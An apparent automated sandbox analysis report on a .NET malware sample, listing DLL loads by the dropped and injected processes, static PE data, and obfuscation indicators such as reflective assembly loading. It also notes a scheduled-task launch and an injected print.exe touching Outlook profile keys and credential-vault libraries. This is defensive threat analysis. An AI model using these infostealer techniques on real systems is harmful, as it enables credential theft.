                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: winsqlite3.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: rasadhlp.dll
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\UnmxRI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\UnmxRI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\SysWOW64\print.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: UnmxRI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: UnmxRI.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                    Source: UnmxRI.exe Static file information: File size 1097216 > 1048576
                    Source: UnmxRI.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10b400
                    Source: UnmxRI.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: UnmxRI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: firefox.pdbP source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: UnmxRI.pdbSHA2561 source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: UnmxRI.pdb source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
                    Source: Binary string: print.pdbGCTL source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152182094.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494232519.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp
                    Source: Binary string: wntdll.pdbUGP source: UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: UnmxRI.exe, UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: print.pdb source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.UnmxRI.exe.2727a28.2.raw.unpack, Ft.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, pxAkq6oWv5iOjnf3uT.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.24d10ec.0.raw.unpack, Ft.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.6850000.10.raw.unpack, Ft.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 10.2.tehuvFgZlLZK.exe.2917b78.0.raw.unpack, Ft.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.UnmxRI.exe.7190000.11.raw.unpack, YQdCYQTI3KHXKvUIgU.cs .Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.cs .Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs .Net Code: hwUiEND30
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.cs .Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.cs .Net Code: ovtD1TeSxq System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs .Net Code: hwUiEND30
                    Source: 0.2.UnmxRI.exe.4fb0000.8.raw.unpack, fLjEu4070dl47BbVwy.cs .Net Code: ooYpdiDj1 System.AppDomain.Load(byte[])
                    Source: UnmxRI.exe Static PE information: 0xB2BAD165 [Wed Jan 7 21:02:29 2065 UTC]
                    Source: UnmxRI.exe Static PE information: section name: .text entropy: 6.837498475160513
                    Source: tehuvFgZlLZK.exe.0.dr Static PE information: section name: .text entropy: 6.837498475160513
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, gWomal9AEbM4h0nux8.csHigh entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YQdCYQTI3KHXKvUIgU.csHigh entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, G8ANMjDiUOOsLbf5bW.csHigh entropy of concatenated method names: 'RB9X2vFRFS', 'MmcXTlI2FD', 'PYSXF7ZpZv', 'zl2XAMBg7S', 'WsJXHR7twv', 'YQvXhh4iT7', 'P8L6oSXl8uTkZbEALR', 'AXnwuwiZMuPbt3xcqe', 'gZBXX0ipLJ', 'XJ8Xjb5fjE'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QqOQQeGEHtIKD26w4j.csHigh entropy of concatenated method names: 'bsfkcaKqpb', 'Vewk3oXNXc', 'd78k740pn5', 'm1JkeY49vx', 'oqgk6IHtop', 'Jeuk2hct4G', 'wFWkTiWGWH', 'bJpk5V1Viv', 'RdRkFKbg66', 'btOkAcOmHC'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, yx3SuvyOU8mOkkWcOq.csHigh entropy of concatenated method names: 'jDmNGidmbU', 'sMgNZpfaZr', 'vH9k4MSTcd', 'euRkXe5nBi', 'oHwNKyZE0u', 'n7yNMB8ynA', 'FYvN9TobXy', 'VuHNmWgQf6', 'PulNWdr2tC', 'wXnNfdaJ55'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SymJM23RQnEk4iIX2O.csHigh entropy of concatenated method names: 'Dispose', 'NitX8BeoJj', 'FhBLryT4lk', 'dFhnnlGX2t', 'n9qXZOQQeE', 'otIXzKD26w', 'ProcessDialogKey', 'ajZL4MmuGV', 'qraLXuB8XD', 'S6kLLWXZXi'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Ekk9xhzYCDV7Ex5F26.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pu1Eguv5Zg', 'qTZEH1KGfY', 'd3GEhkvp36', 'OiWENR5FFf', 'JdFEkgxuOj', 'QZjEEURWTK', 'UpfE0t1Yht'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, p9w2kf7E5ROrPRdwHn.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'R4AL82XYdI', 'EN8LZAWZbV', 'XLQLzMPMw3', 'aR6j4QR4ET', 'zbMjXJ7QlH', 'wZdjLoFL3Y', 'LPDjjrn6MG', 'IsB8PojjsxdJ0uHqSPp'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dy4scYnfQbod41ZQD7.csHigh entropy of concatenated method names: 'b9r2vTjDa3', 'eEA2iHafSf', 'o6m21ErpDf', 'wos2VV3TOu', 'eHB2IloEcE', 'bpQ2xRtV2m', 'hK02Y87xu7', 'YEW2SGeppI', 'Cmb2a4i5yH', 'sGh2bRe8nR'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, dTCWREXjx9L4UMSOtYS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cms0m3nDVm', 'jdK0Wv4TQj', 'Yyl0fBUTgg', 'lAg0u7p1dx', 'BTS0OFaYyB', 'AD60yqXK0j', 'KxA0P62b3p'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, wg7S07bfqZusaPsJR7.csHigh entropy of concatenated method names: 'H5DeI6GtuS', 'cLTeY2DP53', 'Jb27JFyVah', 'Lt77CXFYjZ', 'Myn7odbQbp', 'Htv7tuIhky', 'S2I7dTGqBi', 'u647lXFiOQ', 'xch7n0r6wu', 'wL47U82mf3'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, QvFRFSSlmclI2FDck0.csHigh entropy of concatenated method names: 'Gig3mc1SVe', 'XLc3WuYFwJ', 'zwO3fdWLKx', 'PMO3u53vLM', 'b763O20BGD', 'eTC3ykEQQa', 'kui3PnsM11', 'zA83GHCxs7', 'g8W38WQHh9', 'pdl3Zn8GqB'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, Kwv8QvRh4iT7DFlSdJ.csHigh entropy of concatenated method names: 'tXV6qYbjn1', 's5863VWP2h', 'U8x6e8poL1', 'KIK62wAQbZ', 'gXV6TG8Y8r', 'H9QeObY2ad', 'kifeyyh6WN', 'L5ZePFVMio', 'GkFeGgi5QG', 'fGle8H2J9M'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, NXBkOsdoPa6RYALGIN.csHigh entropy of concatenated method names: 'EpB2cXgwjv', 'KuB27sBrjt', 'iwM2676QBa', 'yPR6ZW7SdG', 'TCR6z5h4Xf', 'A4k24smHTA', 'r1K2XbQJWs', 'j8N2L9xNsX', 'uEo2jKnHXY', 'mfk2Dn8Ckq'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, SXZXiSZvQcU2WLCXGo.csHigh entropy of concatenated method names: 'SdqEX7gxFg', 'vRhEjKJIEa', 'zuQEDVOVUZ', 'WKnEcQ8hjf', 'hZWE3ddLJY', 'v7JEe7uTBX', 'fGEE6HBvbU', 'du4kPUlfr5', 'RXAkGRqt8r', 'vJCk8Df8UL'
                    Source: 0.2.UnmxRI.exe.39fbac0.7.raw.unpack, YMmuGV8NrauB8XDf6k.csHigh entropy of concatenated method names: 'hVwkRKRHGt', 'e6MkrsGX2g', 'qPMkJCmWCj', 'HAgkCO1hNt', 'ooSkmne1QN', 'Mu0ko071mh', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, pxAkq6oWv5iOjnf3uT.csHigh entropy of concatenated method names: 'icjOT7esaw', 'RgtTUJcyZL', 'tgAOeop8hG', 'SQdOgp9kxG', 'QvUO4fqikd', 'g2kOnTKoV9', 'gdqsYhH0gi7JU', 'pRVYZ8BkJ', 'JseuiWZFl', 'DLEr932Lv'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, fLjEu4070dl47BbVwy.csHigh entropy of concatenated method names: 'fLj0Eu470', 'El4O7BbVw', 'hwUiEND30', 'HSH8bFl4M', 'ooYpdiDj1', 'HOPAJfGB3', 'qnP3At5It', 'uFCygHQ01', 'zCkJygWNp', 'NIEFabhsg'
                    Source: 0.2.UnmxRI.exe.36139f0.5.raw.unpack, yfqikd0p32kTKoV93bB.csHigh entropy of concatenated method names: 'ijUOUUVsdX', 'JQtOjsnu1l', 'NUtOMveQlB', 'qEqOEHEb3H', 'TxnO95b71H', 'jB8Oxm27U0', 'ATROQ4dcm2', 'abbOdnfCZw', 'PBiO6KDnyP', 'v95Ot388NV'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Spvk00L9cFCStkrT2y.csHigh entropy of concatenated method names: 'FZ71sLfot', 'mOFVJgvDV', 'fAkxNuLEa', 'o5NYHHQ9Z', 'sREasVbVP', 'gHvbhiYV6', 'mhW7KsNEdR3bhVPXnn', 'WmZtxhBg2cx5LjD8u5', 'xP2kreePw', 'jRV0Mt9Fy'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, SgowY8X4yixBwmDipa9.csHigh entropy of concatenated method names: 'tRpEvCp3rf', 'fWGEiraOI6', 'MdNE17pYHE', 'ruvEV09tSI', 'vc3EI88crE', 'lHBExBdmOo', 'rLREYynI8v', 'RTAESjrxER', 'kGJEauhyH4', 'y8NEbprsEA'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, Bwauf9aYS7ZpZv1l2M.csHigh entropy of concatenated method names: 'YU27VQCOQB', 'UYk7xvVx7s', 'aNA7S5wYOv', 'JPm7aTR3lW', 'j8j7H09ODj', 'n4g7h9UoIo', 'BSW7NMhg4C', 'XE37kM1u71', 'thy7E32DXr', 'rVE70pFWg6'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, gWomal9AEbM4h0nux8.csHigh entropy of concatenated method names: 'R75gSMYCV0', 'TcegabJgLc', 'Y6igRabBIm', 'bCjgrihgkY', 'HsIgCesl4M', 'zaLgoyuWgn', 'fjFgd9eMTp', 'hMYglnJldw', 'wumgULetGr', 'NWxgKBoDdN'
                    Source: 0.2.UnmxRI.exe.3a74ce0.6.raw.unpack, YQdCYQTI3KHXKvUIgU.csHigh entropy of concatenated method names: 'b1Gjqywsu8', 'MrljcGVXXZ', 'w60j37J1IF', 'YDAj7cSHjn', 'aswjeR0rbH', 'TDfj6iu5Gq', 'laLj2VcHZY', 'UfejTx9WJg', 'Y2Yj5QRw9A', 'A7QjF6rjyp'
